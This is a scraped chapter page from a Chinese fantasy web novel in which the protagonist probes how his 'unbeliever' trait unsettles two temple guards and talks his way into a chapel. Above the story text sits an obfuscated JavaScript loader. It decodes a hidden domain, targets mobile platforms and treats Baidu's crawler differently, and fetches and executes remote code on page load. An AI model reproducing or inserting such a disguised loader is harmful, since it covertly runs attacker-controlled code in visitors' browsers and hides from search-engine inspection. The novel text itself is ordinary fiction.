98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

第二十五章:缺失的拼图(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

他们当然不是在跪墨檀,身为有资格在礼拜堂看门的圣堂武士,就算是帕托城的城主亲自来到这儿也得对两位客客气气的,他们跪的是各自所信奉的神……

作为倾向于守序、善良的圣教联合,所联合起来的这些教派中绝没有任何一个会有墨檀刚才所说的那些规矩,普通人也可以在礼拜堂中参拜祈祷这种事且不去说,哪怕是大多数人眼中的‘恶神’也不会拒绝任何一个可能会去拒绝潜在的信徒。

所以他们刚才的行为尽管看上去只是有些反应过激而已,但扣心自问的话,却已经可以称得上是触犯了教义。

当然,至于他们触犯了各自神邸的哪一条教义,违背了一个还是两个,墨檀并不关心,也没有丝毫兴趣,他只是借由这么一个小小的事件证明了某些东西罢了。

那就是无信者的天赋究竟能够对旁人造成多大的影响。

毕竟这个天赋的简介实在是太过于笼统了……

【无信者:你无法选择信仰,因为你根本不会对任何高位存在抱有敬畏之心,没有任何传教者会浪费时间在你身上!没有!】

这个天赋自从被系统强行安放在墨檀的身上后,至今为止并未表现出过任何实际效果,从简介中他大概猜到自己肯定不会被那些宗教人士主动找上门来搞传钅……教,但具体情况却还不知道。

这个天赋也许现在对他影响不大,但却已经足够成为一种隐患,说不定什么时候就会在某种场合下引起一连串意料之外的变故。

而此时的墨檀虽然喜欢且乐于看到变故,却很讨厌任何意料之外的情况发生。

理性的人不可怕,因为他们的思维模式太好推断……

聪明的人不可怕,因为只要用心揣摩,就会发现他们每一步背后所蕴含的想法……

疯子更不可怕,反正都已经疯了嘛~

但是,一个既理性又聪明,同时思维模式还足够鬼神莫测的人就有点儿可怕了。

【虔诚的信徒会对我产生轻微反感以及警惕,但在我做出什么过激举动之前并不会主动对我产生强烈的敌意,不过大概也不会相信我的任何一句话。】

墨檀微微眯起眼睛,一边俯视着那两个正在低声祈祷,请求神邸宽恕的守卫,一边思考着……

【阅历、智慧、理性都有有可能对他们的举动进行矫正,刚才那个年长些的家伙明显想的要比另一个二愣子多,但却没有彻底屏蔽天赋所带来的影响。】

“抱歉,我说的有些太过火了。”墨檀走到两人面前,半跪在他们面前,语气中略带歉然的说道:“因为家里发生了一些烦心事,所以想来咱们城里的礼拜堂祈祷一下,我并没有为难两位的意思,可能是因为母亲病重所以一直有些心神不宁吧,我情绪过激了……”

【如果在他们内心较为脆弱的时候主动示好,并表现出足够善意的话……】

“不,是我之前冒犯了。”年轻的圣堂武士垂下头,惭愧地说道:“没想到您的……”

“小洛!”年长些的武士却沉声打断道:“不要搞错了,我们违背的是教典……你应该首先为自己违背了神的意志与训诫感到惭愧!”

【有作用,不过对于信仰坚定的人收效甚微,这可能跟我的魅力与口才属性有关,但现在还无法验证,可以确信的是,无论是正面影响还是负面影响,面对越强大的信徒就越没有效果,但潜意识中的怀疑却更麻烦……呵呵……有趣,这次就先到这儿吧……】

“那么请问两位,我可以进去了么?”墨檀站起身来礼貌的问道:“我想为家人祈福。”

年长些的那位此时已经祈祷完毕,而且似乎真得到了什么回馈的样子,松了口气道:“请吧,不过麻烦遵守这里的规矩。”

“这个……”墨檀顿时露出了一副略显尴尬的土包子表情,别扭地整理了一下衣着发型,仿佛脸皮子薄的土包子初次进城一样,偏过脸低声道:“规矩什么的……我可能不是特别……”

这种‘拙劣’的尴尬缓解方式实在太容易看破了,那位武士无奈地叹了口气,冲一旁的年轻人道:“小洛,你带他去里面祷告吧,这儿我先看着。”

“好的,前辈。”被称作小洛的圣堂武士连忙应声,随后冲墨檀点了点头:“请跟我来吧。”

其实圣教联合的礼拜堂中并无太多忌讳,毕竟这并非是只供奉着一位神邸的某个独立教派,而是一种相对松散些的联盟,除非有人在大庭广众下做出亵神之举,否则基本上也不会有太多规矩可以触犯。

但是那位圣堂武士也不知道为啥,总觉得面前这个看起来白白净净的家伙有点儿让人放心不下,亵个神啥的……万一他真能干得出来呢?!

所以还是让人看着点儿吧。

而这正是墨檀希望看到的~

“这位骑士大人,刚才实在不好意思啊。”刚迈进礼拜堂,墨檀就冲身边的小洛笑了笑:“无心冒犯,千万别往心里去。”

“哪里哪里!”小洛立刻摆了摆手:“刚才明明是我不对,而且我还远没有资格在圣教中被冠以骑士称号……”

两人说话间已经来到了礼拜堂的中央位置,这个地方尽管看起来较为朴素,但其规模与占地面积都比不远处的城主府大了数倍不止,周围的墙壁上布满了精美的浮雕,上面还穿插着大量祷文与诸多神邸的教义,并且每隔十几步的距离都有一副神迹图,大体讲的是圣教联合**奉的神邸们救灾荒、救苦难、救干旱、救洪涝、救泥石流之类乱七八糟的事迹……

“骑士那么难做么?”墨檀强忍着对周围那些浮雕神像翻白眼的冲动,冲小洛讶然道:“我们镇里都还出过几个骑士呢,他们看起来可没您这么有气质。”

没人不爱听赞美之词,如果真有人不爱听的话,那也是对方的话里带刺儿或者马屁拍的太拙劣,这个道理大家谁都懂。

而墨檀这句一脸淳朴的赞美无疑让这位年轻人有点儿小开心,毕竟以他的资历平时想要被别人夸上两句也没多少机会,尽管在轻轻摇着头,嘴角却还是不自觉的翘了起来:“在我们圣教联合里面获得骑士称号是很难的,能被授以‘圣骑士’之名是我的梦想,但近些年内肯定是不可能的……”

说话间两人已经来到了礼拜堂中央,面前即是一座巨大的众神像,天窗上渗出的光晕将其渡上了一层圣辉,看上去庄严而神圣。

据说圣教联合中的每一座众神像都是由各教派大主祭级别以上的人物统一亲自祝福过的,均具有多种神性,也不知是真是假。

“一般人大多都是在这里祈祷的。”小洛先俯身行了个不知道哪个教派的理解,随后冲墨檀笑了笑:“至于方式则多种多样,众神是仁慈的,并不会过多的要求些什么,何况你也并非信徒……”

墨檀感激地对他点了点头:“谢谢。”

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间